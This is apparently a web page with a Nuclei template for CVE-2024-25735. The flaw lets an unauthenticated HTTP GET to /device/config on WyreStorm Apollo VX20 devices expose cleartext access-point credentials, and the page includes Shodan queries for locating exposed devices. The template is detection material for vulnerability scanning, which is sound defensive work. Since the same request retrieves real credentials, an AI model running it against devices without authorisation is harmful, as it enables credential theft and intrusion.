Skip to content

WyreStorm Apollo VX20 - Information Disclosure

ID: CVE-2024-25735

Severity: high

Author: johnk3r

Tags: packetstorm,cve,cve2024,wyrestorm,info-leak

An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.

id: CVE-2024-25735
info:
name: WyreStorm Apollo VX20 - Information Disclosure
author: johnk3r
severity: high
description: |
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
reference:
- https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
- https://packetstormsecurity.com/files/cve/CVE-2024-25735
- http://packetstormsecurity.com/files/177082
- https://hyp3rlinx.altervista.org
- https://github.com/codeb0ss/CVE-2024-25735-PoC
classification:
epss-score: 0.00381
epss-percentile: 0.72907
metadata:
verified: true
max-request: 1
vendor: wyrestorm
product: apollo vx20
shodan-query:
- ssl:"WyreStorm Apollo VX20"
- ssl:"wyrestorm apollo vx20"
tags: packetstorm,cve,cve2024,wyrestorm,info-leak
http:
- method: GET
path:
- "{{BaseURL}}/device/config"
matchers-condition: and
matchers:
- type: word
words:
- '"password":'
- '"softAp":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a0046304402202e06acec63755ad1974cb33bc8804c45f88fc03dce157a9361fec612de576f3b02205949f7386a4901ed6e5f6f4993858f1676c04922e3b36f4b098464c7ae0cad90:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-25735.yaml"

View on Github